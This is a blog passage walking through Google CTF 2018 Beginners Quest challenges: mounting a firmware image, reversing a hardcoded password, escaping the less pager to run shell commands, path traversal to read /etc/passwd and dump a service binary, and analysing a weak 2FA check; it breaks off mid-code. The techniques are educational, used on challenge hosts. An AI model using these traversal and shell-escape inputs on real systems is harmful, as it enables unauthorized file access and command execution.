Jack Hacks

Google CTF (2018): Beginners Quest - Reverse Engineering Solutions

21 February 2019 at 00:00

In my previous post “Google CTF (2018): Beginners Quest - Web Solutions” we covered the web challenges for the 2018 Google CTF, which touched on a variety of security issues, from the improper use of client-side scripts to simple vulnerabilities like cross-site scripting (also known as XSS).

In this post we will cover the Reverse Engineering solutions for the Beginners Quest, which touched on the topics of… well, Reverse Engineering and issues such as hardcoded passwords.

For those who have never done any sort of binary reverse engineering before, I believe this post will be a great introduction to it. But before you dive into these challenges, I highly suggest you familiarize yourself with the x86 Assembly Guide and also read “Getting Started with Reverse Engineering”, both of which will be beneficial to your learning.

Firmware

Upon reading the challenge description we learn that we got access to a binary file and have to see if we can find anything in it. Interestingly enough, the description states that it’s “now time to walk around the firmware”, which makes me suspect that we need to use binwalk.

First, let’s download the attachment, and extract the file. We should be presented with the following challenge file.

root@kali:~/Google-CTF/Firmware# ls
challenge2.ext4
root@kali:~/Google-CTF/Firmware# file challenge2.ext4 
challenge2.ext4: Linux rev 1.0 ext4 filesystem data, UUID=00ed61e1-1230-4818-bffa-305e19e53758 (extents) (64bit) (large files) (huge files)

Right from the start we notice that the file is of type ext4, which is, as stated by the file output, a Linux filesystem.
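For readers curious how a tool can arrive at that verdict, here is a minimal Python sketch of the core check. It relies on the ext2/3/4 superblock starting 1024 bytes into the image, with the 16-bit little-endian magic value 0xEF53 at offset 56 inside it. The function name and the in-memory test image are made up for illustration, and the real file command inspects more fields than this (for example the feature flags that separate ext4 from ext2/ext3).

```python
import struct

SUPERBLOCK_OFFSET = 1024   # the superblock starts 1024 bytes into the image
MAGIC_OFFSET = 56          # offset of the magic field inside the superblock
EXT_MAGIC = 0xEF53         # shared by ext2, ext3 and ext4


def looks_like_ext(image: bytes) -> bool:
    """Return True if the buffer carries the ext2/3/4 superblock magic."""
    start = SUPERBLOCK_OFFSET + MAGIC_OFFSET
    if len(image) < start + 2:
        return False
    (magic,) = struct.unpack_from("<H", image, start)
    return magic == EXT_MAGIC


# Hypothetical stand-in for the first 2 KiB of challenge2.ext4.
fake_image = bytearray(2048)
struct.pack_into("<H", fake_image, SUPERBLOCK_OFFSET + MAGIC_OFFSET, EXT_MAGIC)
print(looks_like_ext(bytes(fake_image)))
```

To try it on the real attachment, pass in the first 2048 bytes of the file read in binary mode.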

So if we were to run binwalk against this file, we should see a lot of Unix paths.

root@kali:~/Google-CTF/Firmware# binwalk challenge2.ext4 | head

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Linux EXT filesystem, rev 1.0, ext4 filesystem data, UUID=00ed61e1-1230-4818-bffa-305e19e519e5
399144        0x61728         Unix path: /lib/x86_64-linux-gnu/ld-2.19.so
405416        0x62FA8         Unix path: /lib/systemd/systemd
406312        0x63328         Unix path: /lib/systemd/systemd-udevd
611240        0x953A8         Unix path: /etc/alternatives/w.1.gz
617000        0x96A28         Unix path: /etc/alternatives/awk.1.gz
617256        0x96B28         Unix path: /etc/alternatives/nawk.1.gz

Awesome, our assumptions were right! So to access this filesystem, we can simply create a new directory and then use the mount command to mount that filesystem to our newly created directory. We should then be able to access all the files via the mount point.

In this case I created a new directory in root called mnt and mounted the filesystem there.

root@kali:~/Google-CTF/Firmware# mkdir /mnt
root@kali:~/Google-CTF/Firmware# mount challenge2.ext4 /mnt
root@kali:~/Google-CTF/Firmware# ls -la /mnt/
total 45
drwxr-xr-x 22 root root  1024 Feb  4 22:12 .
drwxr-xr-x 24 root root  4096 Feb  8 16:09 ..
drwxr-xr-x  2 root root  3072 Jun 22  2018 bin
drwxr-xr-x  2 root root  1024 Jun 22  2018 boot
drwxr-xr-x  4 root root  1024 Jun 22  2018 dev
drwxr-xr-x 52 root root  4096 Jun 22  2018 etc
drwxr-xr-x  2 root root  1024 Jun 22  2018 home
drwxr-xr-x 12 root root  1024 Jun 22  2018 lib
drwxr-xr-x  2 root root  1024 Jun 22  2018 lib64
drwx------  2 root root 12288 Jun 22  2018 lost+found
drwxr-xr-x  2 root root  1024 Jun 22  2018 media
-rw-r--r--  1 root root    20 Jun 22  2018 .mediapc_backdoor_password
-rw-r--r--  1 root root    40 Jun 22  2018 .mediapc_backdoor_password.gz
drwxr-xr-x  2 root root  1024 Jun 22  2018 mnt
drwxr-xr-x  2 root root  1024 Jun 22  2018 opt
drwxr-xr-x  2 root root  1024 Jun 22  2018 proc
drwx------  2 root root  1024 Jun 22  2018 root
drwxr-xr-x  4 root root  1024 Jun 22  2018 run
drwxr-xr-x  2 root root  3072 Jun 22  2018 sbin
drwxr-xr-x  2 root root  1024 Jun 22  2018 srv
drwxr-xr-x  2 root root  1024 Jun 22  2018 sys
drwxr-xr-x  2 root root  1024 Jun 22  2018 tmp
drwxr-xr-x 10 root root  1024 Jun 22  2018 usr
drwxr-xr-x  9 root root  1024 Jun 22  2018 var

Great, we can read the files! Right away I see that the .mediapc_backdoor_password file looks interesting! Let’s see what’s inside.

root@kali:~/Google-CTF/Firmware# cat /mnt/.mediapc_backdoor_password
CTF{I_kn0W_tH15_Fs}

There we go, we found our flag! Now before we move on, let’s make sure we unmount this filesystem from our Linux box. We can simply use the umount command against the mount directory.

root@kali:~/Google-CTF/Firmware# umount /mnt
root@kali:~/Google-CTF/Firmware# ls -la /mnt/
total 8
drwxr-xr-x  2 root root 4096 Feb  8 16:09 .
drwxr-xr-x 24 root root 4096 Feb  8 16:09 ..

FLAG: CTF{I_kn0W_tH15_Fs}

Gatekeeper

Upon reading the challenge description we learn that we got access to some sort of remote control service binary from a PC we purchased. Again we notice a slight hint in the description where it states that “nothing is the right way around”. I wonder what that might mean… oh well, let’s dig into the binary!

As previously, download the attachment and extract the file. We should then be presented with the following ELF binary.

root@kali:~/Google-CTF/Gatekeeper# ls
gatekeeper
root@kali:~/Google-CTF/Gatekeeper# file gatekeeper 
gatekeeper: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a89e770cbffa17111e4fddb346215ca04e794af2, not stripped

Alright, so I always like to play around with the binary first to see how it functions before I start reverse engineering it. So let’s execute the binary and see what happens.

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper 
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
[ERROR] Login information missing
Usage: ./gatekeeper <username> <password>

Okay, without providing any arguments we get usage instructions, which let us know that we need to pass a username and password into the program. Let’s see what happens if we pass in the combination of admin:admin.

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper admin admin
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
 ~> Verifying....
ACCESS DENIED
 ~> Incorrect username

Access Denied… of course. So it seems that we need to find a valid username and password. I’m going to guess that these values are hardcoded.

What we can do to make life easy, and try to go for a quick “win”, is to use a tool like strings against the binary. This will print out every sequence of printable characters found in the binary, possibly revealing the username and password!

NOTE: I trimmed some of the output for readability.

root@kali:~/Google-CTF/Gatekeeper# strings ./gatekeeper
---trim---
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
ACCESS DENIED
[ERROR] Login information missing
Usage: %s <username> <password>
 ~> Verifying.
0n3_W4rM
 ~> Incorrect username
zLl1ks_d4m_T0g_I
Correct!
Welcome back!
 ~> Incorrect password
---trim---

Right away we can see all the strings the binary uses, including what seems to be a username and password! I’m going to assume that 0n3_W4rM is the username as it comes first, and the password is zLl1ks_d4m_T0g_I since it follows after.
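As a rough illustration of what strings is doing under the hood, the following Python sketch pulls out every run of at least four printable ASCII bytes (four is the default minimum length for strings). The function name and the sample blob are made up for this example, and the real tool has more options and slightly different rules about which characters count as printable.

```python
import re


def printable_strings(data: bytes, min_len: int = 4):
    """Yield runs of at least min_len printable ASCII bytes found in data."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")


# Hypothetical blob that mimics a few bytes of the .rodata section.
blob = b"\x00\x01 ~> Verifying.\x000n3_W4rM\x00\x7f\x02ab\x00zLl1ks_d4m_T0g_I\x00"
for s in printable_strings(blob):
    print(s)
```

Runs shorter than the minimum (like the two-byte "ab" in the sample) are skipped, which is why strings output tends to be readable rather than pure noise.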

Let’s test this to see if we are right!

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper 0n3_W4rM zLl1ks_d4m_T0g_I
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
 ~> Verifying.......ACCESS DENIED
 ~> Incorrect password

Okay, we got the right username, but the password for some reason doesn’t work. Alright, it’s time we tear this program apart and dig into it a little bit deeper to see why this password doesn’t work.

Let’s open this binary using IDA. If you don’t have IDA yet, you can download the Free Version of it here.

Using IDA should be pretty self explanatory and I’ll try to explain as best as I can, but if you’d like - you can read the Reverse Engineering with Ida Pro slides by Chris Eagle to get a better idea of how to use it.

Okay, moving on. Once you open the binary up and have it loaded, press Shift+F12 together to open the Strings Window. This window will display all the strings in the binary. Once done, scroll down and find the password that we entered.

Once we find the password, go ahead and double click that password. This will bring us directly to the .rodata segment which is a memory segment utilized for constant data. As you can see, the password characters will be highlighted in yellow.

Since the .rodata memory region for where the password is located is already highlighted, press the x button on your keyboard to cross reference the password. This will bring up a new screen that will show us where this string is used or called from.

By double clicking the cross reference, we should be taken directly into the IDA Graph View, which will show the disassembled application and its function calls/flows.

Initially, right above and below the password, I see a mov instruction that loads data from memory at [rbp+dest] and moves it into the rax register. We then see that the lea or “load effective address” instruction loads the address of the password string into the rsi or Source Index register.

Then another mov instruction is called that sets the rdi or Destination Index to that of the rax register which should be the data that was loaded from memory. This then calls the strcmp function against these two strings.

So my question is… what’s it comparing it to? If we scroll up in the Graph View, we will see the following.

Take note that I explain what’s going on in the image. Simply put, this portion of the program gets the length of an argument, which in our case is argv[2] or our password, and then allocates a buffer on the heap equal to the string length plus 1. The password we passed into the program is then copied into the allocated space.

So to give you a better visual representation of what the assembly is doing, I can show you what the C code for this will look like. It should look like the following:

v1 = strlen(argv[2]);
dest = (char *)malloc(v1 + 1);
strcpy(dest, argv[2]);

First the strlen function is called to get the length of the password (the number of characters before the terminating null byte), and the result is stored in a new variable.

You can then see that malloc is being used (both in C and in the disassembly) to allocate memory on the heap for the dest variable, which is where the password will be stored.

Finally strcpy is called to copy the password into the allocated destination buffer.

At the end we see that another mov instruction is called that sets the memory value located at [rbp+var_8] to 0.

This then jumps to loc_B2A, which is the string reverse function loop.

Simply put, this is a string reverse routine: it swaps the first character of the password with the last, the second with the second to last, and so on until it reaches the middle.

Now there’s one thing that you need to understand about strings in C, and that’s that a string is simply an array of characters in memory terminated by a null byte, usually accessed through a pointer to its first character. This allows for the manipulation of strings as an array because… well because it’s an array!

If you’re confused you can read “C Strings (Arrays vs. Pointers)” to better understand it.

The C code for this function will look like the following:

for (i = 0; i < strlen(dest) >> 1; i++)
{
    v2 = dest[i];
    dest[i] = dest[strlen(dest) - i - 1];
    dest[strlen(dest) - i - 1] = v2;
}

As you can see, the rax register holds the length of the string stored at [rbp+dest]. The shr instruction then shifts that value right by 1 bit, which halves it. This halved length is the loop bound: the cmp instruction compares the loop counter against it, and once the counter reaches half the string length the program continues execution to the left.

Otherwise it will jump to loc_AC8 and swap the character at the current index with its mirror at the other end of the string, thus reversing the string one pair at a time.
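If the loop is easier to follow in a higher-level language, here is a small Python sketch of the same in-place swap. The function name is my own, and a bytearray stands in for the heap buffer since Python strings are immutable; it mirrors the C reconstruction rather than the exact instructions in the binary.

```python
def reverse_in_place(buf: bytearray) -> None:
    """Swap mirrored characters until the middle of the buffer is reached."""
    n = len(buf)
    i = 0
    while i < n >> 1:  # same bound as strlen(dest) >> 1 in the C version
        buf[i], buf[n - i - 1] = buf[n - i - 1], buf[i]
        i += 1


password = bytearray(b"zLl1ks_d4m_T0g_I")
reverse_in_place(password)
print(password.decode())
```

Only half the string needs to be walked because every swap fixes two positions at once; for odd lengths the middle character simply stays where it is.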

Alright, so we know that the password is being reversed. Let’s reverse it ourselves and see if it works.

root@kali:~/Google-CTF/Gatekeeper# echo "zLl1ks_d4m_T0g_I" | rev
I_g0T_m4d_sk1lLz

After getting the reversed password, let’s test it!

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper 0n3_W4rM I_g0T_m4d_sk1lLz
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
 ~> Verifying.......Correct!
Welcome back!
CTF{I_g0T_m4d_sk1lLz}

And there we have it! We got our flag!

FLAG: CTF{I_g0T_m4d_sk1lLz}

Closing

The Reverse Engineering challenges were pretty easy to be honest! They weren’t overly complex if you knew what you were looking at. For those who are struggling with reverse engineering, I always suggest looking at the call instructions to see which functions are being called - this makes it easier to understand what’s going on.

If you had trouble understanding the assembly then I suggest you take the Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration by Open Security Training. They have a lot of courses that can help you get started in assembly and reverse engineering.

Also, Malware Unicorn has a great Reverse Engineering 101 workshop that I highly suggest you read!

At the same time, I believe that “Hacking: The Art of Exploitation” and “Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation” are great books if you want to get started in exploitation and reverse engineering.

With that being said, I hope you all learned something new from this write up! Stay tuned for my next post as we cover the final PWN challenges!

Just note, the PWN challenges will be split up into two separate posts for easier readability.

Thanks for reading!

Google CTF (2018): Beginners Quest - PWN Solutions (1/2)

22 February 2019 at 00:00

In my previous post “Google CTF (2018): Beginners Quest - Reverse Engineering Solutions”, we covered the reverse engineering solutions for the 2018 Google CTF, which introduced vulnerabilities such as hardcoded data, and also introduced the basics of x86 Assembly.

In this post we will cover the first set of PWN solutions for the Beginners Quest, which touches on topics such as code injection, reverse engineering, buffer overflows, and format string exploits.

Thankfully for us I introduced the basics of x86 Assembly in my previous post via the x86 Assembly Guide. I highly suggest you familiarize yourself with that if you haven’t already, since the PWN challenges will require you to have at least some sort of understanding.

Also, if you aren’t familiar with format string exploits, I suggest you go watch LiveOverflow’s “A simple Format String exploit example - bin 0x11” video which covers this vulnerability pretty well.

Once you have some basic understanding of x86 ASM, Buffer Overflows and Format Strings, we can jump right into the challenges!

Moar

Upon reading the challenge description we learn that we got access to the Foobaziner9000 machine. Unfortunately it seems that the computer is complicated, but to assist us it seems to also be serving manual pages through a network service. Once again, the devil is in the details as the description states that “everything you need is in the manual”.

Alright, with that in mind we see that we can access the manual pages service via moar.ctfcompetition.com on port 1337. Let’s use netcat to connect to that service and see what it has to offer.

root@kali:~/Google-CTF# nc moar.ctfcompetition.com 1337
socat(1)                                                              socat(1)

NAME
       socat - Multipurpose relay (SOcket CAT)

SYNOPSIS
       socat [options] <address> <address>
       socat -V
       socat -h[h[h]] | -?[?[?]]
       filan
       procan

DESCRIPTION
       Socat  is  a  command  line based utility that establishes two bidirec-
       tional byte streams  and  transfers  data  between  them.  Because  the
       streams  can be constructed from a large set of different types of data
       sinks and sources (see address types),  and  because  lots  of  address
       options  may be applied to the streams, socat can be used for many dif-
       ferent purposes.

       Filan is a utility  that  prints  information  about  its  active  file
       descriptors  to  stdout.  It  has been written for debugging socat, but
       might be useful for other purposes too. Use the -h option to find  more
 Manual page socat(1) line 1 (press h for help or q to quit)

Okay, so it seems we got a manual page about socat, but don’t let this fool you into thinking that we have to exploit socat, because we don’t!

Right away I notice that the manual page is being displayed by the less pager. If we were to look into the manual pages for less, we should find the following in the commands section.

! shell-command

Invokes a shell to run the shell-command given. A percent sign (%) in the command is replaced by the name of the current file. A pound sign (#) is replaced by the name of the previously examined file. “!!” repeats the last shell command. “!” with no shell command simply invokes a shell. On Unix systems, the shell is taken from the environment variable SHELL, or defaults to “sh”. On MS-DOS and OS/2 systems, the shell is the normal command processor.

So what this means is that we can type in an exclamation mark (!) followed by a shell command to execute commands on the server.

Let’s see if this is possible! We can try running the ls -la command to list all the files in the current working directory of the server.

 Manual page socat(1) line 1 (press h for help or q to quit)!ls -la
!ls -la
total 76
drwxr-xr-x  21 moar   moar    4096 Oct 24 19:10 .
drwxr-xr-x  21 moar   moar    4096 Oct 24 19:10 ..
-rwxr-xr-x   1 nobody nogroup    0 Oct 24 19:05 .dockerenv
drwxr-xr-x   2 nobody nogroup 4096 Jun 14  2018 bin
drwxr-xr-x   2 nobody nogroup 4096 Apr 12  2016 boot
drwxr-xr-x   4 nobody nogroup 4096 Oct 24 19:05 dev
drwxr-xr-x  44 nobody nogroup 4096 Oct 24 19:05 etc
drwxr-xr-x   3 nobody nogroup 4096 Jun 14  2018 home
drwxr-xr-x   8 nobody nogroup 4096 Sep 13  2015 lib
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 lib64
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 media
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 mnt
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 opt
dr-xr-xr-x 111 nobody nogroup    0 Feb  9 02:16 proc
drwx------   2 nobody nogroup 4096 Apr 17  2018 root
drwxr-xr-x   5 nobody nogroup 4096 Apr 17  2018 run
drwxr-xr-x   2 nobody nogroup 4096 Apr 27  2018 sbin
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 srv
drwxr-xr-x   2 nobody nogroup 4096 Feb  5  2016 sys
drwxrwxrwt   2 moar   moar      40 Feb  9 02:16 tmp
drwxr-xr-x  10 nobody nogroup 4096 Apr 17  2018 usr
drwxr-xr-x  11 nobody nogroup 4096 Apr 17  2018 var

Awesome, it worked! So we found our command injection. Let’s see what’s in the home folder.

!ls -la /home
total 12
drwxr-xr-x  3 nobody nogroup 4096 Jun 14  2018 .
drwxr-xr-x 21 moar   moar    4096 Oct 24 19:10 ..
drwxr-xr-x  2 nobody nogroup 4096 Jun 29  2018 moar
!done  (press RETURN)!ls -la /home/moar

!ls -la /home/moar
total 24
drwxr-xr-x 2 nobody nogroup 4096 Jun 29  2018 .
drwxr-xr-x 3 nobody nogroup 4096 Jun 14  2018 ..
-rw-r--r-- 1 nobody nogroup  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 nobody nogroup 3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 nobody nogroup  655 May 16  2017 .profile
-r-xr-xr-x 1 nobody nogroup  695 Jun 26  2018 disable_dmz.sh

The disable_dmz.sh file looks interesting, let’s read it and find out what’s inside!

!done  (press RETURN)!cat /home/moar/disable_dmz.sh

!cat /home/moar/disable_dmz.sh
#!/bin/sh

# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

echo 'Disabling DMZ using password CTF{SOmething-CATastr0phic}'
echo CTF{SOmething-CATastr0phic} > /dev/dmz

And just like that we found the flag, an easy start!

FLAG: CTF{SOmething-CATastr0phic}

Admin UI

Upon reading the challenge description we learn that after compromising the Foobaziner9000 we were able to remove it from the DMZ. This gave us access to a new device which seems to be a smart home temperature control unit. Fortunately for us it seems that the management interface looks to be filled with bugs, hence all the talk on the dark net.

Alright, knowing that there might be a few bugs in the interface, let’s connect to the service provided to us via netcat.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

Right from the start we see that we have three choices. The Service access option looks promising, let’s see what it does.

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
admin
Incorrect, the authorities have been informed!

Okay, so it seems that we need a valid password for the service access. Let’s leave that for later and try the second option to read the patch notes.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
Version0.2
# Release 0.2
 - Updated library X to version 0.Y
 - Fixed path traversal bug
 - Improved the UX

Upon reading the patch notes, we can see this golden piece of information: Fixed path traversal bug. For those unfamiliar with path traversals, it’s simply a vulnerability that allows you to access files and directories stored outside the folder the application intended to expose.

Unfortunately, it seems to have been patched, but that doesn’t mean we shouldn’t attempt to exploit it. Let’s see if we can read the /etc/passwd file.
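To make the idea concrete, here is a minimal Python sketch of how a path traversal arises when user input is joined onto a base directory without validation, along with one common way to detect it. The base directory and both function names are hypothetical; nothing here is taken from the challenge binary, whose real lookup logic we have not seen at this point.

```python
import posixpath

BASE_DIR = "/srv/app/patchnotes"  # hypothetical directory, not from the challenge


def naive_path(name: str) -> str:
    """Join user input onto the base directory without any validation."""
    return posixpath.normpath(posixpath.join(BASE_DIR, name))


def is_inside_base(name: str) -> bool:
    """Return True only if the resolved path stays under BASE_DIR."""
    resolved = naive_path(name)
    return posixpath.commonpath([BASE_DIR, resolved]) == BASE_DIR


print(naive_path("Version0.2"))
print(naive_path("../../../../../../../etc/passwd"))
print(is_inside_base("../../../../../../../etc/passwd"))
```

Each ../ climbs one directory, and extra ones are harmless once the root is reached, which is why attackers usually send more of them than strictly needed.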

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
user:x:1337:1337::/home/user:

Awesome! So the vulnerability wasn’t properly patched and we can read files on the system. Unfortunately for us, we’re kind of blind here as we don’t know where the other files on the system might be, or what they might be called.

But, we have a secret weapon! Since we’re connecting to a running service and can read files, we can try to read the proc filesystem which provides an interface to kernel data structures. It is commonly mounted at /proc and can actually reveal a lot about the current process that’s running.

If we look into the proc manual pages, we can find the following in the “files and directories” portion.

/proc/[pid]/cmdline

This read-only file holds the complete command line for the process, unless the process is a zombie. In the latter case, there is nothing in this file: that is, a read on this file will return 0 characters. The command-line arguments appear in this file as a set of strings separated by null bytes (‘\0’), with a further null byte after the last string.

By reading this file, we should be able to see what the name of the executable is and should also see the location that it’s being run from. If we find that out, we can then use the path traversal vulnerability to read the binary and dump its contents to our local machine, which can then be reverse engineered.

Also note that we would normally need to know the pid of the service. Thankfully for us, instead of a pid we can just use self: /proc/self always refers to the process that is doing the reading, which here is the service itself, so there’s no need to guess.
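Since the cmdline file is just null-separated strings, parsing it takes only a few lines. The sketch below shows one way to do it in Python; the function name is my own and the sample inputs are made up to mimic what such a file can contain.

```python
def parse_cmdline(raw: bytes) -> list:
    """Split the contents of a /proc/[pid]/cmdline file into its arguments."""
    if not raw:
        return []  # zombie processes expose an empty cmdline
    if raw.endswith(b"\x00"):
        raw = raw[:-1]  # drop the null byte that follows the last string
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00")]


# Hypothetical samples: a bare program name and a command with arguments.
print(parse_cmdline(b"./main\x00"))
print(parse_cmdline(b"nc\x00example.host\x001337\x00"))
```

On a Linux box you can feed it the contents of /proc/self/cmdline, opened in binary mode, to see the arguments of your own Python process.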

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../../../../../proc/self/cmdline
./main

Great, we can see that the binary is called main. Knowing this, let’s go ahead and dump the binary onto our local machine with the following command.

root@kali:~/Google-CTF/Admin UI# echo -e "2\n../main" | nc mngmnt-iface.ctfcompetition.com 1337 >> main.bin
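One thing to keep in mind is that everything the service sends gets redirected into main.bin, so the dump most likely begins with the menu and prompt text rather than with the binary itself. A minimal Python sketch for trimming that prefix is shown below: it looks for the ELF magic bytes (0x7F followed by "ELF") and keeps everything from there on. The function name and sample data are made up, and the sketch assumes nothing needs trimming from the end of the capture, which may not hold.

```python
ELF_MAGIC = b"\x7fELF"


def carve_elf(dump: bytes) -> bytes:
    """Return the dump starting at the first ELF header, dropping any prefix."""
    start = dump.find(ELF_MAGIC)
    if start == -1:
        raise ValueError("no ELF header found in dump")
    return dump[start:]


# Hypothetical capture: menu text followed by the start of an ELF file.
sample = (
    b"=== Management Interface ===\n 1) Service access\n"
    + ELF_MAGIC
    + b"\x02\x01\x01rest-of-binary"
)
print(carve_elf(sample)[:4])
```

Running the file command on the trimmed output is a quick way to confirm that what remains is recognized as an ELF executable.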

Now that we have the binary file on our machine, let’s open it up in IDA and see if we can’t find the password for the service access.

Once the binary is loaded, press Shift+F12 in IDA to open the strings window and let’s find the “Please enter the backdoo^Wservice password:” string.

Once we find the string, double click it, and in the .rodata section press x to get the cross reference for where this string is being called from.

If done properly, you should see the following:

Right away I notice that after the string is printed via the puts function, the lea or “load effective address” instruction is used to load the address of _ZL9FLAG_FILE into the rdi or Destination Index register.

Okay, this is simple. It seems that the application loads the flag from a file on the disk and uses that as the first password. Since the flag is loaded from disk, let’s see if we can’t read the flag using our path traversal vulnerability.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../flag
CTF{I_luv_buggy_sOFtware}

Easy, we found the flag!

FLAG: CTF{I_luv_buggy_sOFtware}

Admin UI 2

This portion of the challenge is the continuation from Admin UI. Upon reading the description we learn that the first flag we got was a dud, but there seems to be a password somewhere in the binary file. Reversing the binary should give us the access we need.

Alright, so as always, let’s test the binary to see what happens after we enter the password. This should give us the baseline of what to look for in the binary once we start reverse engineering it.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
admin
Access denied

We can clearly see that the first password worked, but then we needed a second password for 2FA. Knowing this, let’s dig back into the binary and return to where we previously found the flag file.

We need to find where the second login occurs. Successful authentication via the first password would take the flow pointed out by the green arrow. So let’s scroll down the graph, where you should be able to spot the secondary login function.

From here, double click the _Z15secondary_loginv function. This will jump us over to that function’s Graph View.

Alright, looking into the secondary password function, we can see that the scanf function is called with the %127s format, which reads at most 127 characters and leaves room for the terminating null byte in a 128-byte buffer. This scanf call grabs our password input and stores it in a variable called password.

It then creates a new variable and assigns it the length of the entered password via the strlen function.

The C code for this section would look like the following:

char password[128];
size_t l;

puts("Two factor authentication required !");
puts("Please enter secret secondary password:");
scanf("%127s", password);
l = strlen(password);

Okay, so it accepts our password input, but what does it do with our password? Looking a little lower in the Graph View, we see the following.

We can see that variables are set up for a loop function, hence the cmp instruction at the top checking if the loop is completed. If the loop is done, it jumps to loc_414144D6.

If the loop is not done, it does the following. The application loads the address of the password input via the lea or “load effective address” instruction, then grabs a character from the password at the index held in the rax register, which the mov instruction loads from the counter at [rbp+i].

This character from the password is then xored with the hexadecimal value C7. Once xored, the result replaces the previous character at the specified index. The add instruction then increments the loop counter at [rbp+i] and jumps to loc_4141449F, which then runs the cmp instruction to see if the loop has finished.

To help you visualize what’s going on in C, we’ll be adding on to the previous code we built. The for loop and xor should look like the following:

char password[128];
size_t l;
size_t i;

puts("Two factor authentication required !");
puts("Please enter secret secondary password:");
scanf("%127s", password);
l = strlen(password);
for (i = 0LL; i < l; ++i)
   password[i] ^= 0xC7u;

Once the loop is completed the code jumps over to loc_414144D6 which carries out a cmp instruction.

Now, before we go any further, take a really good look at this! Notice how after the XOR operation completes, there is specifically one compare operation that takes place.

This is a bug: the cmp instruction basically just checks if the password length in [rbp+l] is equal to 23h, or 35 in decimal!

That means that any password that’s 35 bytes long will work and pass the authorization check!
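To see why this is so weak, here is a small Python model of the check as I read it from the disassembly. It is a sketch of my interpretation rather than the service’s real source, and the function names are my own: the input is xored with 0xC7, but only its length decides the outcome.

```python
KEY = 0xC7


def xor_bytes(data: bytes) -> bytes:
    """XOR every byte with the single-byte key 0xC7."""
    return bytes(b ^ KEY for b in data)


def secondary_login_accepts(password: bytes) -> bool:
    """Model of the flawed check: the xored bytes are never actually compared."""
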